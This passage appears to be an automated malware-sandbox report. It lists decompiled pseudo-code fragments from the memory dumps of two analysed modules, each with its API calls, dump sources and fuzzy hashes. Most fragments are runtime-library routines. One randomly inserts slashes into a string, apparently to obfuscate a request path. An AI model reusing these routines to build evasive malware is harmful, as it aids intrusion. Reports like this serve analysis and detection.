                                                                                                                                                                                                                                0x736d9e39
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e60
                                                                                                                                                                                                                                0x736d9e62
                                                                                                                                                                                                                                0x736d9e7b
                                                                                                                                                                                                                                0x736d9e82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e6d
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e46
                                                                                                                                                                                                                                0x736d9e4b
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e51
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e01
                                                                                                                                                                                                                                0x736d9e07
                                                                                                                                                                                                                                0x736d9e09
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e18
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e0d

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,736DDF75,00000000,00000001,736DC385,?,736DE432,00000001,?,?,?,736DC31E,?,00000000), ref: 736D9C98
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9CF5
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9D2B
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000004,000000FF,?,736DE432,00000001,?,?,?,736DC31E,?,00000000,00000000,736E9C70,0000002C,736DC385), ref: 736D9D36
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2283115069-0
                                                                                                                                                                                                                                • Opcode ID: 851fdb5d67182659618ecdaa01b788713263788b9e48cea8b931b3184352cd74
                                                                                                                                                                                                                                • Instruction ID: 67a44d6bcc46deb1608fb8d3d85c04aea9b8fb6d16fbc401b6060eff744216a3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851fdb5d67182659618ecdaa01b788713263788b9e48cea8b931b3184352cd74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7111CA332697053BEF1126B68E88F1B26E9F7C3675B380628F529971C8FE7589054118
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D9DEA(void* __ecx) {
                                                                                                                                                                                                                                				intOrPtr _t2;
                                                                                                                                                                                                                                				signed int _t3;
                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                				signed int _t18;
                                                                                                                                                                                                                                				long _t21;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t21 = GetLastError();
                                                                                                                                                                                                                                				_t2 =  *0x736eb050; // 0x4
                                                                                                                                                                                                                                				_t24 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					_t3 = E736DBC10(__eflags, _t2, 0xffffffff);
                                                                                                                                                                                                                                					__eflags = _t3;
                                                                                                                                                                                                                                					if(_t3 == 0) {
                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t18 = E736DA236(1, 0x364);
                                                                                                                                                                                                                                						__eflags = _t18;
                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                							__eflags = E736DBC10(__eflags,  *0x736eb050, _t18);
                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                								E736D9A91(_t18, 0x736efafc);
                                                                                                                                                                                                                                								E736DA293(0);
                                                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t13 = 0;
                                                                                                                                                                                                                                								E736DBC10(__eflags,  *0x736eb050, 0);
                                                                                                                                                                                                                                								_push(_t18);
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t13 = 0;
                                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                                							E736DBC10(0,  *0x736eb050, 0);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							E736DA293();
                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t18 = E736DBBD1(_t24, _t2);
                                                                                                                                                                                                                                					if(_t18 == 0) {
                                                                                                                                                                                                                                						_t2 =  *0x736eb050; // 0x4
                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t18 != 0xffffffff) {
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t13 = _t18;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							L3:
                                                                                                                                                                                                                                							_t13 = 0;
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							_t18 = _t13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				SetLastError(_t21);
                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                				return  ~_t18 & _t13;
                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e51
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e01
                                                                                                                                                                                                                                0x736d9e07
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e18
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e8d
                                                                                                                                                                                                                                0x736d9e95
                                                                                                                                                                                                                                0x736d9e9e

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736D9DEF
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9E4C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9E82
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000004,000000FF,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736D9E8D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2283115069-0
                                                                                                                                                                                                                                • Opcode ID: 2114873e75f4510dcb69ee662b3dc4e80ac427be31634503da50bf18635ef86d
                                                                                                                                                                                                                                • Instruction ID: a3292ceadf456f39e1371fda9e56ad2405294d444ba4aefc0b9fc455f3a4df56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2114873e75f4510dcb69ee662b3dc4e80ac427be31634503da50bf18635ef86d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A11C6336693053BEF0222A78D84F1B22A9BFC2671B280328F129971C5FE618C154128
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A8698B(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                				signed short _t23;
                                                                                                                                                                                                                                				char* _t27;
                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                				unsigned int _t33;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				unsigned int _t38;
                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                				int _t45;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t42 = __eax;
                                                                                                                                                                                                                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                				_t38 = __eax;
                                                                                                                                                                                                                                				_t30 = RtlAllocateHeap( *0xa8d270, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                				_v12 = _t30;
                                                                                                                                                                                                                                				if(_t30 != 0) {
                                                                                                                                                                                                                                					_v8 = _t42;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t33 = 0x18;
                                                                                                                                                                                                                                						if(_t38 <= _t33) {
                                                                                                                                                                                                                                							_t33 = _t38;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t21 =  *0xa8d288; // 0x5e99fac9
                                                                                                                                                                                                                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                						 *0xa8d288 = _t23;
                                                                                                                                                                                                                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                						 *_t27 = 0x2f;
                                                                                                                                                                                                                                						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                						_t30 = _t13;
                                                                                                                                                                                                                                					} while (_t38 > 8);
                                                                                                                                                                                                                                					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v12;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A8233E,00000000,?,?,00A8A714,?,01AE95B0), ref: 00A86996
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A869AE
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00A8233E,00000000,?,?,00A8A714,?,01AE95B0), ref: 00A869F2
                                                                                                                                                                                                                                • memcpy.NTDLL(00000001,?,00000001), ref: 00A86A13
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1819133394-0
                                                                                                                                                                                                                                • Opcode ID: 3319510ed173b066408b0aa025cd865029ec6f714fb9fb48e82d72ee08eba249
                                                                                                                                                                                                                                • Instruction ID: 0bf8afef5ddf54504aee4add8c1d7f58a8cf783acef53b07bd55032209f27201
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3319510ed173b066408b0aa025cd865029ec6f714fb9fb48e82d72ee08eba249
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E11C272A00215EFD710DFA9DC84D9ABBBEEB843A0B15027AF50597290E6709E0597A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                                                                                			E00A86ABB(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				void _v60;
                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edi;
                                                                                                                                                                                                                                				_t26 = _a8;
                                                                                                                                                                                                                                				_t28 = E00A810E9(_a4, _t26, __edi);
                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                					memset( &_v60, 0, 0x38);
                                                                                                                                                                                                                                					_t18 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t28 = 0;
                                                                                                                                                                                                                                					_v64 = 0x3c;
                                                                                                                                                                                                                                					if(_a12 == 0) {
                                                                                                                                                                                                                                						_t7 = _t18 + 0xa8e4e8; // 0x70006f
                                                                                                                                                                                                                                						_t19 = _t7;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t6 = _t18 + 0xa8e8f0; // 0x750072
                                                                                                                                                                                                                                						_t19 = _t6;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v52 = _t19;
                                                                                                                                                                                                                                					_push(_t28);
                                                                                                                                                                                                                                					_v48 = _a4;
                                                                                                                                                                                                                                					_v44 = _t26;
                                                                                                                                                                                                                                					_v36 = _t27;
                                                                                                                                                                                                                                					E00A87020();
                                                                                                                                                                                                                                					_push( &_v64);
                                                                                                                                                                                                                                					if( *0xa8d0e4() == 0) {
                                                                                                                                                                                                                                						_t28 = GetLastError();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_push(1);
                                                                                                                                                                                                                                					E00A87020();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t28;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A810E9: SysAllocString.OLEAUT32(00000000), ref: 00A81143
                                                                                                                                                                                                                                  • Part of subcall function 00A810E9: SysAllocString.OLEAUT32(0070006F), ref: 00A81157
                                                                                                                                                                                                                                  • Part of subcall function 00A810E9: SysAllocString.OLEAUT32(00000000), ref: 00A81169
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A86ADE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A86B2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$ErrorLastmemset
                                                                                                                                                                                                                                • String ID: <$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3736384471-3662781078
                                                                                                                                                                                                                                • Opcode ID: 8c0051f3a284f82277a87305d00225f729a5696a818c589deca5ceadd399b3b1
                                                                                                                                                                                                                                • Instruction ID: aebb9cc4796d1541ada40473f938712ba5e6805be348f517a5f865ec097b3f24
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c0051f3a284f82277a87305d00225f729a5696a818c589deca5ceadd399b3b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07011771A00218EBDB11FFE5E889EDEBBBCAB08754F104026F904EB251E73099018BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DF176(void* _a4, long _a8, DWORD* _a12) {
                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = WriteConsoleW( *0x736eb850, _a4, _a8, _a12, 0);
                                                                                                                                                                                                                                				if(_t13 == 0 && GetLastError() == 6) {
                                                                                                                                                                                                                                					E736DF15F();
                                                                                                                                                                                                                                					E736DF121();
                                                                                                                                                                                                                                					_t13 = WriteConsoleW( *0x736eb850, _a4, _a8, _a12, _t13);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,736DC385,00000000,?,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001), ref: 736DF18D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000,00000001,?,736DE456,736DC31E), ref: 736DF199
                                                                                                                                                                                                                                  • Part of subcall function 736DF15F: CloseHandle.KERNEL32(FFFFFFFE,736DF1A9,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000,00000001), ref: 736DF16F
                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 736DF1A9
                                                                                                                                                                                                                                  • Part of subcall function 736DF121: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,736DF150,736DEBC2,00000001,?,736DDF02,00000000,00000000,00000001,00000000), ref: 736DF134
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,736DC385,00000000,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000), ref: 736DF1BE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                • Opcode ID: cafeb815edae79d153899c59b6accdaa79fc20fd8e7e5bd3ec8fdb6a8a913c64
                                                                                                                                                                                                                                • Instruction ID: 95232f7cdbc041a43871ea34cd9a6b5427bee782e7d9b302e20c9f486b7e61d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafeb815edae79d153899c59b6accdaa79fc20fd8e7e5bd3ec8fdb6a8a913c64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F01C37151259BBCF123FD2CC08B8A3F76FB082B2F144450FA1D9A264DA328820EB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A81F47() {
                                                                                                                                                                                                                                				void* _t1;
                                                                                                                                                                                                                                				intOrPtr _t5;
                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t1 =  *0xa8d2a4; // 0x218
                                                                                                                                                                                                                                				if(_t1 == 0) {
                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				SetEvent(_t1);
                                                                                                                                                                                                                                				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					SleepEx(0x64, 1);
                                                                                                                                                                                                                                					_t5 =  *0xa8d2f4; // 0x0
                                                                                                                                                                                                                                					if(_t5 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                					if(_t11 > 0) {
                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t6 =  *0xa8d2a4; // 0x218
                                                                                                                                                                                                                                				if(_t6 != 0) {
                                                                                                                                                                                                                                					CloseHandle(_t6);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t7 =  *0xa8d270; // 0x16f0000
                                                                                                                                                                                                                                				if(_t7 != 0) {
                                                                                                                                                                                                                                					HeapDestroy(_t7);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L8;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000218,00000001,00A859AE), ref: 00A81F52
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 00A81F61
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000218), ref: 00A81F82
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32(016F0000), ref: 00A81F92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4109453060-0
                                                                                                                                                                                                                                • Opcode ID: 475598ea1765660cada142810de68819597de4287f806adff5df7385f4f20608
                                                                                                                                                                                                                                • Instruction ID: 5c8c51323982b945662a44a0026deb5d2982e0675cfb03259b89b1182934b460
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 475598ea1765660cada142810de68819597de4287f806adff5df7385f4f20608
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F01C71B01312DBDB20FBB49D08A9237ACAB157B17040615B919DB1D0EB30CC03CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D95E1() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E736DA293( *0x736efb08);
                                                                                                                                                                                                                                				 *0x736efb08 = 0;
                                                                                                                                                                                                                                				E736DA293( *0x736efb0c);
                                                                                                                                                                                                                                				 *0x736efb0c = 0;
                                                                                                                                                                                                                                				E736DA293( *0x736ef7ec);
                                                                                                                                                                                                                                				 *0x736ef7ec = 0;
                                                                                                                                                                                                                                				E736DA293( *0x736ef7f0);
                                                                                                                                                                                                                                				 *0x736ef7f0 = 0;
                                                                                                                                                                                                                                				return 1;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D95EA
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D95FD
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D960E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D961F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 5297ee021d7d605a17a10f33212a850ba32dd53e09148c51bb0070ce930f99cc
                                                                                                                                                                                                                                • Instruction ID: b996a84b17f854129880ddc4232b88cba3e0281053167d4f0f7e0ea558b3dc78
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5297ee021d7d605a17a10f33212a850ba32dd53e09148c51bb0070ce930f99cc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDE01A778963209BDF027F13E60C6453B25F744B003B6401AE40C4A358D7BA4B2AEF88
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                			E736D8EE0(void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char* _v20;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char* _t26;
                                                                                                                                                                                                                                				intOrPtr* _t36;
                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                				signed int _t43;
                                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                                                                                				signed int _t49;
